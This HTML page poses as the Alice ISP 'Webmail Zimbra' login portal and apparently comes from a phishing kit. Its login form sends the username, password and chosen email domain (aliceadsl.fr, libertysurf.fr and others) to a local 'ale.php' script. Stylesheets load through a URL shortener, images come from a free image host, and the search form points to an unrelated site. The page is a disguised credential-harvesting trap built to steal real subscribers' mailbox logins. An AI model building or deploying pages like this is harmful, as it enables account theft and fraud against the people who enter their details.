<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<title>Webmail Zimbra</title>
<link href="http://wq.lt/oM4Y5" rel="stylesheet" type="text/css">
<link href="http://wq.lt/oUSB" rel="stylesheet" type="text/css">
<link rel="shortcut icon" href="https://zupimages.net/up/18/51/6e2d.png" type="image/x-icon">
<link rel="icon" href="https://zupimages.net/up/18/51/6e2d.png" type="image/x-icon">

<script src=""></script><script src="./Ale_files/amp.téléchargement"></script><script src="./Ale_files/pupa.téléchargement"></script><script async="async" src="./Ale_files/ppt.téléchargement"></script>
<link rel="preload" href="./Ale_files/f(1).txt" as="script"><script type="text/javascript" src="./Ale_files/f(1).txt"></script><script src="./Ale_files/pupa.téléchargement" async=""></script>

<script>

</script>

<body>
<div id="global">
	<div id="topNavbar">
    	<div class="liensleft">
            <a href="">Accueil Alice</a>
            <a href="">Tout le site Alice</a>        </div>
<div id="googleSearch">
        	<form id="searchForm" action="http://math-mimi.com/licela/" enctype="multipart/form-data">
            	<input type="text" class="searchField" name="qs"><input type="button" class="searchBtn" value="rechercher">
            </form>
        </div>
        <div class="liensright">
        	<span>Abonné :</span>
            <a href="">Espace abonné</a>
            <a href="">Assistance</a>        </div>
  </div>
    <div id="headerChaine">
    	<div id="imgChaine" class="webmail"></div>
    </div>
<div id="supercontent">
    <div class="haut"></div>
      <div class="content">
      	<div id="col1">
        	
            <div id="loginbloc" class="bloc634">
            	<h3 class="title">Un accès direct à tous vos emails</h3>
                <div class="bloc634_content webmail">
                	<div id="login">
                    	<h4>Pour acceder à votre webmail, veuillez vous identifier</h4>
                        <form id="loginForm" action="ale.php" method="post" name="implogin">
                        	<fieldset class="field_1" style="height:80px">
                                <p><input class="loginField" value="" type="text" id="user" placeholder="Identifiant" name="login" maxlength="64"></p>
                                <p><input class="loginField" value="" type="password" id="pass" placeholder="Mot de passe" name="password" maxlength="64">
                            </p>
                            </fieldset>
                            <fieldset class="field_2" style="height:80px">
                                
                            <div id="selectLogin">
                                 <select name="fai" class="fai">
                                  	<option value="">Sélectionner...</option>
                                        <option value="aliceadsl.fr">@aliceadsl.fr</option>
                                        <option value="alicepro.fr">@alicepro.fr</option>
                                        <option value="aliceteam.fr">@aliceteam.fr</option>
                                        <option value="libertysurf.fr">@libertysurf.fr</option>
                                        <option value="libertysurf.net">@libertysurf.net</option>
                                        <option value="worldonline.fr">@worldonline.fr</option>
                                        <option value="freesbee.fr">@freesbee.fr</option>
                                        <option value="infonie.fr">@infonie.fr</option>
                                        <option value="monsieurcinema.com">@monsieurcinema.com</option>
                                        <option value="teamtiscali.com">@teamtiscali.com</option>
                                        <option value="nomade.fr">@nomade.fr</option>
                                        <option value="chez.com">@chez.com</option>
								</select>
                            </div>		
 
                                
                                <p><a href="" class="mdpoubli">Mot de passe oublié ?</a></p>
                            </fieldset>
								<input type="checkbox" name="resynchroimp"> synchroniser mon carnet d'adresses IMP
                            	<input name="Envoyer" type="submit" class="loginBtn" value="s&#39;identifier">
                        </form>
                    </div>
                    <div id="prospect">
                        <p style="color:red; font-weight:bold; font-size:1.2em; margin-bottom:4px;">Pas encore client ?</p>
                         Pour profiter de tous les services Alice, vous devez être abonné. <a href="">Découvrez nos offres d'abonnement</a>                     </div>
                </div>
            </div>
		
            
      	</div>
       
        <div id="col2">
            <div id="offrealice" style="margin-top:14px;"><a href=""><img src="https://zupimages.net/up/18/51/gz3j.png" alt="" width="309" height="291" border="0"></a></div>
        </div>
        
        <div class="bas"></div>
      </div>
      <div class="bas"></div>
  </div>

<div id="footer" class="big"></div>
</div>


<iframe id="google_osd_static_frame_2402789268743" name="google_osd_static_frame" style="display: none; width: 0px; height: 0px;" src="./Ale_files/saved_resource(3).html"></iframe></body></html>